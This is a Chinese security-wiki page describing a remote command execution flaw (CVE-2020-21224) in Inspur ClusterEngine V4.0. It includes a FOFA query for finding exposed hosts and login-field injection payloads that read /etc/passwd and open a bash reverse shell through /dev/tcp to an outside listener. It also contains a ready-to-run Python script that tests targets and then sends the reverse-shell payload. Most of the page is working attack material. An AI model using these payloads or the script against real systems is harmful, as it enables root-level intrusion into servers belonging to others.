menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right All_wiki chevron_right yougar0.github.io(基于零组公开漏洞库 + PeiQi文库的一些漏洞)-20210715 chevron_right Web安全 chevron_right 浪潮 chevron_right 浪潮ClusterEngineV4.0 远程命令执行漏洞 CVE-2020-21224.md
  • home 首页
  • brightness_4 暗黑模式
  • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    浪潮ClusterEngineV4.0 远程命令执行漏洞 CVE-2020-21224.md
    6.72 KB / 2021-04-21 09:23:46
        # 浪潮ClusterEngineV4.0 远程命令执行漏洞 CVE-2020-21224
    
    ## 漏洞描述
    
    浪潮服务器群集管理系统存在危险字符未过滤,导致远程命令执行
    
    ## 漏洞影响
    
    `浪潮ClusterEngineV4.0`
    
    ## FOFA
    
    `title="TSCEV4.0"`
    
    ## 漏洞复现
    登录页面如下
    
    ![](resource/浪潮ClusterEngineV4.0-远程命令执行漏洞-CVE-2020-21224/media/1.png)
    
    由于登录页面没有发现验证码,进行账号爆破
    
    当burpsuite爆破完成时,注意到POST数据中如果带有 ;' ,响应数据包发生异常。
    
    ![](resource/浪潮ClusterEngineV4.0-远程命令执行漏洞-CVE-2020-21224/media/2.png)
    
    通过响应包信息,猜测可能存在一个远程执行代码漏洞,并将此数据包放在repeater中,我发现如果发布数据中有一个`'`,系统将抛出异常。
    
    ![](resource/浪潮ClusterEngineV4.0-远程命令执行漏洞-CVE-2020-21224/media/3.png)
    
    ![](resource/浪潮ClusterEngineV4.0-远程命令执行漏洞-CVE-2020-21224/media/4.png)
    
    进一步测试时,我发现username参数或password任一参数如果包含`'`,将引发此异常
    
    ![](resource/浪潮ClusterEngineV4.0-远程命令执行漏洞-CVE-2020-21224/media/5.png)
    
    尝试发送`''`来查看响应包。
    
    ![](resource/浪潮ClusterEngineV4.0-远程命令执行漏洞-CVE-2020-21224/media/6.png)
    
    我注意到 grep 命令错误,服务端的代码可能是这样
    
    ```bash
    var1 = `grep xxxx` 
    var2 = $(python -c "from crypt import crypt;print crypt('$username','$1$$var1')")
    ```
    
    尝试发送 `-V` 和 `--help` 来查看响应包,响应包证实了猜测
    
    ![](resource/浪潮ClusterEngineV4.0-远程命令执行漏洞-CVE-2020-21224/media/7.png)
    
    ![](resource/浪潮ClusterEngineV4.0-远程命令执行漏洞-CVE-2020-21224/media/8.png)
    
    尝试读取 `/etc/passswd`
    
    ![](resource/浪潮ClusterEngineV4.0-远程命令执行漏洞-CVE-2020-21224/media/9.png)
    
    尝试列目录
    
    ![](resource/浪潮ClusterEngineV4.0-远程命令执行漏洞-CVE-2020-21224/media/10.png)
    
    确认存在一个远程执行命令执行漏洞,经过fuzz,得到以下payload
    
    ![](resource/浪潮ClusterEngineV4.0-远程命令执行漏洞-CVE-2020-21224/media/11.png)
    
    ![](resource/浪潮ClusterEngineV4.0-远程命令执行漏洞-CVE-2020-21224/media/12.png)
    
    反弹 shell
    
    ```bash
    op=login&username=1 2\',\'1\'\);`bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F10.16.11.81%2F80%200%3E%261`
    ```
    
    payload发送后, 在 kali linux 服务器上获取了一个 root 权限的 shell
    
    ![](resource/浪潮ClusterEngineV4.0-远程命令执行漏洞-CVE-2020-21224/media/13.png)
    
    上面是原文的测试思路,但经过重新测试之后发现还有另一种简单方法
    
    ```bash
    POC测试(出现 root:x:0:0 则存在漏洞)
    op=login&username=sec`$(cat /etc/passwd)`
    
    {"err":"/bin/sh: root:x:0:0:root:/root:/bin/bash: No such file or directory\n","exitcode":1,"out":"the user peiqi does not exist\nerror:1\n"}
    ```
    
    反弹shell
    
    ```bash
    op=login&username=sec`$(bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F{IP}}%2F{PORT}%200%3E%261)`
    ```
    
    ![](resource/浪潮ClusterEngineV4.0-远程命令执行漏洞-CVE-2020-21224/media/14.png)
    
    ## 漏洞利用POC
    
    ```python
    import requests
    import sys
    import random
    import re
    from requests.packages.urllib3.exceptions import InsecureRequestWarning
    
    def title():
        print('+------------------------------------------')
        print('+  \033[34mPOC_Des: http://wiki.peiqi.tech                                   \033[0m')
        print('+  \033[34mGithub : https://github.com/PeiQi0                                 \033[0m')
        print('+  \033[34m公众号  : PeiQi文库                                                   \033[0m')
        print('+  \033[34mVersion: 浪潮ClusterEngineV4.0                                     \033[0m')
        print('+  \033[36m使用格式:  python3 poc.py                                            \033[0m')
        print('+  \033[36mUrl         >>> http://xxx.xxx.xxx.xxx                             \033[0m')
        print('+  \033[36mIP          >>> xxx.xxx.xxx.xxx:9999                              \033[0m')
        print('+  \033[36mPORT        >>> 9999                                              \033[0m')
        print('+------------------------------------------')
    
    def POC_1(target_url):
        vuln_url = target_url + "/login"
        headers = {
            "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36",
            "Content-Type": "application/x-www-form-urlencoded",
            "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
        }
        data = "op=login&username=peiqi`$(cat /etc/passwd)`"
        try:
            requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
            response = requests.post(url=vuln_url, headers=headers, data=data, verify=False, timeout=4)
            etc_passwd = re.findall(r'\{"err":"/bin/sh: (.*?): No such', response.text)
            if response.status_code == 200 and "root:x:0:0" in response.text:
                print("\033[32m[o]    目标 {} 可能存在漏洞, 响应为:{} \033[0m".format(target_url, etc_passwd[0]))
                POC_2(target_url)
            else:
                print("\033[31m[x] 目标 {} 不存在漏洞 \033[0m".format(target_url))
        except Exception as e:
            print("\033[31m[x] 目标 {} 请求失败 \033[0m".format(target_url))
    
    def POC_2(target_url):
        IP = str(input("\033[35m请输入监听IP   >>> \033[0m"))
        PORT = str(input("\033[35m请输入监听PORT >>> \033[0m"))
        vuln_url = target_url + "/login"
        headers = {
            "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36",
            "Content-Type": "application/x-www-form-urlencoded",
            "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
        }
        data = "op=login&username=`bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F{}%2F{}%200%3E%261`".format(IP, PORT)
        try:
            requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
            response = requests.post(url=vuln_url, headers=headers, data=data, verify=False)
        except Exception as e:
            print("\033[31m[x] 目标 {} 请求失败 \033[0m".format(target_url))
    
    if __name__ == '__main__':
        title()
        target_url = str(input("\033[35mPlease input Attack Url\nUrl    >>> \033[0m"))
        POC_1(target_url)
    ```
    
    ![](resource/浪潮ClusterEngineV4.0-远程命令执行漏洞-CVE-2020-21224/media/15.png)
    
    ## Goby & POC
    
    
    
    已上传 https://github.com/PeiQi0/PeiQi-WIKI-POC Goby & POC 目录中
    
    `ClusterEngineV4.0_RCE`
    
    ![](resource/浪潮ClusterEngineV4.0-远程命令执行漏洞-CVE-2020-21224/media/16.png)
    
    ## 参考文章
    https://github.com/NS-Sp4ce/Inspur/tree/master/ClusterEngineV4.0%20Vul
    
    
    links
    file_download